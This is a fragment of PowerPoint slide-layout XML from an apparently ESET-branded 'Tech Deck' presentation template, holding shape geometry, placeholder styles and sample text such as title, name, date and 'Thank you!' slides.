            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1/1/2023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4F2A0DC-8F63-789C-C548-DA515F5720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72000" y="8784000"/>
            <a:ext cx="4105159" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="508000">
              <a:schemeClr val="tx2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="241300" dist="38100" dir="5400000" sx="85000" sy="85000" algn="t" rotWithShape="0">
              <a:srgbClr val="004B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2940087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Images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7FBCF3B-DC0C-B94A-05F4-DC0C79A28B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BCAD57E3-99FC-CFD5-1427-ECE47B34C9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CD1C6C9-FB60-50E2-3612-8009F9D9D34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2B5D4F1-2B80-DE54-1383-35773E0A8C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E45A7BF-3955-CB0D-9514-92CB5A39CA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2C696C4-3914-DF71-3EF4-CFFA37D99B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C4BE47FF-1E04-6D4F-5226-5B0065C0E54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C9D0B029-760D-7768-CBEB-1658F1C2F5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134AB4B-C19B-E6ED-508C-F93E79643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5B2879CF-7A50-EF39-8CB5-0DC37D20B80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72584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F6B8451A-C2D0-7BFF-0656-5531C8934D7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06660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E864AAAB-1F13-C6B3-F547-AA2E975B2C2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40736" y="319467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84E51C0D-9943-3431-31D3-EC624450C4F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4274812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6584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Images Circle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7FBCF3B-DC0C-B94A-05F4-DC0C79A28B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BCAD57E3-99FC-CFD5-1427-ECE47B34C9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CD1C6C9-FB60-50E2-3612-8009F9D9D34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2B5D4F1-2B80-DE54-1383-35773E0A8C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E45A7BF-3955-CB0D-9514-92CB5A39CA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2C696C4-3914-DF71-3EF4-CFFA37D99B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C4BE47FF-1E04-6D4F-5226-5B0065C0E54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C9D0B029-760D-7768-CBEB-1658F1C2F5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760377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134AB4B-C19B-E6ED-508C-F93E79643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5B2879CF-7A50-EF39-8CB5-0DC37D20B80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72584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F6B8451A-C2D0-7BFF-0656-5531C8934D7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06660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E864AAAB-1F13-C6B3-F547-AA2E975B2C2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40736" y="319467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84E51C0D-9943-3431-31D3-EC624450C4F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4274812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925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Images Squares turq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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46558413-0BDB-B020-371B-65AE3305019C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Freeform: Shape 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69C67296-386F-80A2-2FAC-1E1F9951D79F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="14579424" y="7001300"/>
            <a:ext cx="3708576" cy="32856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20059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20059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226133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226133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55FF0BB-FEF2-7845-AEA2-C7C67F472F8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350296" y="3055101"/>
            <a:ext cx="3014663" cy="30146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B4AA2CD4-91AE-15D4-5047-D058C7A5156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636668" y="3055101"/>
            <a:ext cx="3014663" cy="30146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F977CC7-D310-08FD-4968-35876E337A0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856368" y="3055101"/>
            <a:ext cx="3014663" cy="30146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55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Images Squares turq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7FBCF3B-DC0C-B94A-05F4-DC0C79A28B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BCAD57E3-99FC-CFD5-1427-ECE47B34C9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0377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CD1C6C9-FB60-50E2-3612-8009F9D9D34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2B5D4F1-2B80-DE54-1383-35773E0A8C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760377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E45A7BF-3955-CB0D-9514-92CB5A39CA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2C696C4-3914-DF71-3EF4-CFFA37D99B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760377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C4BE47FF-1E04-6D4F-5226-5B0065C0E54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C9D0B029-760D-7768-CBEB-1658F1C2F5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760377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134AB4B-C19B-E6ED-508C-F93E79643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5B2879CF-7A50-EF39-8CB5-0DC37D20B80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72584" y="3192131"/>
            <a:ext cx="2740603" cy="2740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F6B8451A-C2D0-7BFF-0656-5531C8934D7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06660" y="3192131"/>
            <a:ext cx="2740603" cy="2740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E864AAAB-1F13-C6B3-F547-AA2E975B2C2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40736" y="3194671"/>
            <a:ext cx="2740603" cy="2740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84E51C0D-9943-3431-31D3-EC624450C4F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4274812" y="3192131"/>
            <a:ext cx="2740603" cy="27406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381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Images Circles turq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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96898DD8-FC9E-EC8D-3714-DAE00678AB7D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Freeform: Shape 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78DD43C7-C42A-C28B-5EB9-A175D41B25F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="14579424" y="7001300"/>
            <a:ext cx="3708576" cy="32856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20059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20059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226133" y="6540221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226133" y="7426150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55FF0BB-FEF2-7845-AEA2-C7C67F472F8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350296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B4AA2CD4-91AE-15D4-5047-D058C7A5156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636668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F977CC7-D310-08FD-4968-35876E337A0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856368" y="3055101"/>
            <a:ext cx="3014663" cy="301466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071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Images Circles turq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7FBCF3B-DC0C-B94A-05F4-DC0C79A28B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BCAD57E3-99FC-CFD5-1427-ECE47B34C9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0377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CD1C6C9-FB60-50E2-3612-8009F9D9D34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2B5D4F1-2B80-DE54-1383-35773E0A8C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760377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E45A7BF-3955-CB0D-9514-92CB5A39CA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2C696C4-3914-DF71-3EF4-CFFA37D99B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760377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C4BE47FF-1E04-6D4F-5226-5B0065C0E54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673305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C9D0B029-760D-7768-CBEB-1658F1C2F5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760377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134AB4B-C19B-E6ED-508C-F93E79643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5B2879CF-7A50-EF39-8CB5-0DC37D20B80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72584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F6B8451A-C2D0-7BFF-0656-5531C8934D7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06660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E864AAAB-1F13-C6B3-F547-AA2E975B2C2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40736" y="319467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84E51C0D-9943-3431-31D3-EC624450C4F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4274812" y="3192131"/>
            <a:ext cx="2740603" cy="274060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88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 - text and imag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8DF5C-8DB6-19D9-735A-0616BAD649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76300"/>
            <a:ext cx="8267700" cy="16605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2 Column Layout Text and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8FE30D-144C-B987-1C5A-C1E9CDA95C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6300" y="3057525"/>
            <a:ext cx="8267700" cy="63531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200"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/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B5BF07-9DE2-B4EF-CD9F-C8B683E0A6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826625" y="0"/>
            <a:ext cx="8461375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722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 - text and image - left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8DF5C-8DB6-19D9-735A-0616BAD649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76300"/>
            <a:ext cx="8267700" cy="16605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2 Column Layout Text and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8FE30D-144C-B987-1C5A-C1E9CDA95C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6300" y="3057525"/>
            <a:ext cx="8267700" cy="63531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200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/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B5BF07-9DE2-B4EF-CD9F-C8B683E0A6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826625" y="0"/>
            <a:ext cx="8461375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8916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 - text and imag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8DF5C-8DB6-19D9-735A-0616BAD649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0" y="876300"/>
            <a:ext cx="8267700" cy="16605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2 Column Layout Text and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8FE30D-144C-B987-1C5A-C1E9CDA95C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4000" y="3057525"/>
            <a:ext cx="8267700" cy="63531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200"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/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B5BF07-9DE2-B4EF-CD9F-C8B683E0A6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8461375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8233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 - text and image - right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8DF5C-8DB6-19D9-735A-0616BAD649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0" y="876300"/>
            <a:ext cx="8267700" cy="16605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2 Column Layout Text and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8FE30D-144C-B987-1C5A-C1E9CDA95C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4000" y="3057525"/>
            <a:ext cx="8267700" cy="63531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200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/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B5BF07-9DE2-B4EF-CD9F-C8B683E0A6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8461375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26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Tech Deck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1536484"/>
            <a:ext cx="9654373" cy="35814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0000"/>
              </a:lnSpc>
              <a:defRPr sz="9000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ESET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6301" y="5255997"/>
            <a:ext cx="9131858" cy="1450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500">
                <a:solidFill>
                  <a:srgbClr val="87CFD3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err="1"/>
              <a:t>Subheadline</a:t>
            </a:r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B20EF9-3D25-52F4-8567-10AF721D02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7053977"/>
            <a:ext cx="3586162" cy="51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2500" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="3000" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="2700" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="2400" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="2400"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>John Smith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A9820CD4-35F0-D860-6521-472B1F2F0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14061"/>
            <a:ext cx="3586162" cy="5159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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Position at ESET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50FB943-52AF-0572-835A-1257A716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895202"/>
            <a:ext cx="3586162" cy="412806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>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1/1/2023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7D520E-5AB1-9B7B-6D99-8C1799C862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72000" y="8784000"/>
            <a:ext cx="4103227" cy="720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80703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8DF5C-8DB6-19D9-735A-0616BAD649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3200400"/>
            <a:ext cx="7448550" cy="1660525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr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8FE30D-144C-B987-1C5A-C1E9CDA95C1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76300" y="5381625"/>
            <a:ext cx="7448550" cy="13430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4000">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl5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B5BF07-9DE2-B4EF-CD9F-C8B683E0A6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44000" y="892674"/>
            <a:ext cx="7692159" cy="850165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8967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8DF5C-8DB6-19D9-735A-0616BAD649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3200400"/>
            <a:ext cx="7448550" cy="1660525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr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8FE30D-144C-B987-1C5A-C1E9CDA95C1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76300" y="5381625"/>
            <a:ext cx="7448550" cy="13430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4000">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl5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B5BF07-9DE2-B4EF-CD9F-C8B683E0A6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44000" y="892674"/>
            <a:ext cx="3657600" cy="3657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DE93B09-710F-7596-025E-80F56EFB91E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754100" y="876300"/>
            <a:ext cx="3657600" cy="3657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4ED45DDB-7B6A-1EE7-C000-E6F270EA8AB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0" y="5753100"/>
            <a:ext cx="3657600" cy="3657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B75E7F4-57A0-F395-74A6-C6DA12CDAAF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754100" y="5736726"/>
            <a:ext cx="3657600" cy="3657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5220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C98CFC68-C48A-C23C-3C66-19F8FA56C9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3807975"/>
            <a:ext cx="16535400" cy="2974109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="80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Questions?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DAE9EB9-FB3B-0746-436D-607AB7A2FC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5871" y="7629759"/>
            <a:ext cx="2576258" cy="143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882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28959" y="3586911"/>
            <a:ext cx="7715041" cy="2974109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="8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Thank you!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873E030-5936-7219-10DF-C83EB9EE68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5763" y="3324713"/>
            <a:ext cx="4341668" cy="76183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52447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C13D7C94-843A-3B46-026C-EE7FF3D189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920729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Simple slide content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DAE9EB9-FB3B-0746-436D-607AB7A2FC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855871" y="7974636"/>
            <a:ext cx="2576259" cy="1431255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E5BE0C-DD41-FB4D-DA97-C3D1AEEDF3E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010409" y="2863516"/>
            <a:ext cx="10267183" cy="36215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6858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2pPr>
            <a:lvl3pPr marL="13716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3pPr>
            <a:lvl4pPr marL="20574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4pPr>
            <a:lvl5pPr marL="27432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6318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 with logo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C13D7C94-843A-3B46-026C-EE7FF3D189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920729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Simple slide content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DAE9EB9-FB3B-0746-436D-607AB7A2FC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5871" y="7974636"/>
            <a:ext cx="2576258" cy="1431255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E5BE0C-DD41-FB4D-DA97-C3D1AEEDF3E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010409" y="2863516"/>
            <a:ext cx="10267183" cy="36215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6858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2pPr>
            <a:lvl3pPr marL="13716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3pPr>
            <a:lvl4pPr marL="20574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4pPr>
            <a:lvl5pPr marL="27432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3155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920729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Simple slide content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E5BE0C-DD41-FB4D-DA97-C3D1AEEDF3E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010409" y="2863516"/>
            <a:ext cx="10267183" cy="547692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6858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2pPr>
            <a:lvl3pPr marL="13716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3pPr>
            <a:lvl4pPr marL="20574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4pPr>
            <a:lvl5pPr marL="27432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3C04D7C7-9C5A-0FC6-DC91-3BA02252F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18410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64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920729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Simple slide content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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3C04D7C7-9C5A-0FC6-DC91-3BA02252F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E5BE0C-DD41-FB4D-DA97-C3D1AEEDF3E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010409" y="2863516"/>
            <a:ext cx="10267183" cy="547692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6858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2pPr>
            <a:lvl3pPr marL="13716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3pPr>
            <a:lvl4pPr marL="20574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4pPr>
            <a:lvl5pPr marL="27432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6802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64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AF9B2761-4C48-23D8-0538-F012E2CAD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4427872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en-US"/>
              <a:t>One liner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3519653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r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AF9B2761-4C48-23D8-0538-F012E2CAD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4427872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en-US"/>
              <a:t>One liner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34838293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ustom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1536484"/>
            <a:ext cx="10724573" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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r>
              <a:rPr lang="en-US"/>
              <a:t>ESET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6300" y="5255997"/>
            <a:ext cx="10724573" cy="1450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500">
                <a:solidFill>
                  <a:schemeClr val="bg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err="1"/>
              <a:t>Subheadline</a:t>
            </a:r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B20EF9-3D25-52F4-8567-10AF721D02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7053977"/>
            <a:ext cx="3586162" cy="51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2500" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="3000" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="2700" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="2400" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="2400"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>John Smith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A9820CD4-35F0-D860-6521-472B1F2F0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14061"/>
            <a:ext cx="3586162" cy="5159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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Position at ESET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50FB943-52AF-0572-835A-1257A716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895202"/>
            <a:ext cx="3586162" cy="412806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>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1/1/2023</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2904953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aphic 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA8A69C-8E3E-5E14-F457-35A403742C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13981136" y="7603641"/>
            <a:ext cx="4306864" cy="3552069"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3973996"/>
              <a:gd name="connsiteY0" fmla="*/ 3277537 h 3277537"/>
              <a:gd name="connsiteX1" fmla="*/ 3973997 w 3973996"/>
              <a:gd name="connsiteY1" fmla="*/ 3277537 h 3277537"/>
              <a:gd name="connsiteX2" fmla="*/ 3973997 w 3973996"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 3277537"/>
              <a:gd name="connsiteX3" fmla="*/ 1848144 w 3973996"/>
              <a:gd name="connsiteY3" fmla="*/ 1227313 h 3277537"/>
              <a:gd name="connsiteX4" fmla="*/ 1588675 w 3973996"/>
              <a:gd name="connsiteY4" fmla="*/ 1377110 h 3277537"/>
              <a:gd name="connsiteX5" fmla="*/ 13375 w 3973996"/>
              <a:gd name="connsiteY5" fmla="*/ 3224281 h 3277537"/>
              <a:gd name="connsiteX6" fmla="*/ 13132 w 3973996"/>
              <a:gd name="connsiteY6" fmla="*/ 3225254 h 3277537"/>
              <a:gd name="connsiteX7" fmla="*/ 13132 w 3973996"/>
              <a:gd name="connsiteY7" fmla="*/ 3225254 h 3277537"/>
              <a:gd name="connsiteX8" fmla="*/ 12888 w 3973996"/>
              <a:gd name="connsiteY8" fmla="*/ 3226227 h 3277537"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 3973996"/>
              <a:gd name="connsiteY9" fmla="*/ 3277537 h 32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73996" h="3277537">
                <a:moveTo>
                  <a:pt x="0" y="3277537"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3973997" y="3277537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3973997" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1848144" y="1227313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1588675" y="1377110"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="952281" y="1755737"/>
                  <a:pt x="269197" y="2269569"/>
                  <a:pt x="13375" y="3224281"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13375" y="3224525"/>
                  <a:pt x="13375" y="3225011"/>
                  <a:pt x="13132" y="3225254"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13132" y="3225254"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13132" y="3225254"/>
                  <a:pt x="13132" y="3225984"/>
                  <a:pt x="12888" y="3226227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8268" y="3243493"/>
                  <a:pt x="4377" y="3260515"/>
                  <a:pt x="0" y="3277537"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="87CFD3"/>
          </a:solidFill>
          <a:ln w="2052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2880" tIns="182880" rIns="182880" bIns="18288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876300"/>
            <a:ext cx="16535400" cy="514350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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  <a:br>
              <a:rPr lang="en-US"/>
            </a:b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D9EDF35-5E2D-F730-672F-A0304BDF47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76300" y="2009776"/>
            <a:ext cx="5374958" cy="6991350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24D5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0FC6BA4-F2FE-10F8-1E56-608C50CFCABA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456520" y="2009776"/>
            <a:ext cx="5374958" cy="6991350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24D5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6AF3544-FEF4-D0DE-603E-CBB69039779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036740" y="2009776"/>
            <a:ext cx="5374958" cy="6991350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424D5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B7B62AA-2FA7-BF6A-48B8-CCCF96A956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045" y="9407812"/>
            <a:ext cx="2279055" cy="39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438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vy text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aphic 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA8A69C-8E3E-5E14-F457-35A403742C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13981136" y="7603641"/>
            <a:ext cx="4306864" cy="3552069"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3973996"/>
              <a:gd name="connsiteY0" fmla="*/ 3277537 h 3277537"/>
              <a:gd name="connsiteX1" fmla="*/ 3973997 w 3973996"/>
              <a:gd name="connsiteY1" fmla="*/ 3277537 h 3277537"/>
              <a:gd name="connsiteX2" fmla="*/ 3973997 w 3973996"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 3277537"/>
              <a:gd name="connsiteX3" fmla="*/ 1848144 w 3973996"/>
              <a:gd name="connsiteY3" fmla="*/ 1227313 h 3277537"/>
              <a:gd name="connsiteX4" fmla="*/ 1588675 w 3973996"/>
              <a:gd name="connsiteY4" fmla="*/ 1377110 h 3277537"/>
              <a:gd name="connsiteX5" fmla="*/ 13375 w 3973996"/>
              <a:gd name="connsiteY5" fmla="*/ 3224281 h 3277537"/>
              <a:gd name="connsiteX6" fmla="*/ 13132 w 3973996"/>
              <a:gd name="connsiteY6" fmla="*/ 3225254 h 3277537"/>
              <a:gd name="connsiteX7" fmla="*/ 13132 w 3973996"/>
              <a:gd name="connsiteY7" fmla="*/ 3225254 h 3277537"/>
              <a:gd name="connsiteX8" fmla="*/ 12888 w 3973996"/>
              <a:gd name="connsiteY8" fmla="*/ 3226227 h 3277537"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 3973996"/>
              <a:gd name="connsiteY9" fmla="*/ 3277537 h 3277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73996" h="3277537">
                <a:moveTo>
                  <a:pt x="0" y="3277537"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3973997" y="3277537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3973997" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1848144" y="1227313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1588675" y="1377110"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="952281" y="1755737"/>
                  <a:pt x="269197" y="2269569"/>
                  <a:pt x="13375" y="3224281"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13375" y="3224525"/>
                  <a:pt x="13375" y="3225011"/>
                  <a:pt x="13132" y="3225254"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13132" y="3225254"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13132" y="3225254"/>
                  <a:pt x="13132" y="3225984"/>
                  <a:pt x="12888" y="3226227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8268" y="3243493"/>
                  <a:pt x="4377" y="3260515"/>
                  <a:pt x="0" y="3277537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 w="2052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2880" tIns="182880" rIns="182880" bIns="18288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876300"/>
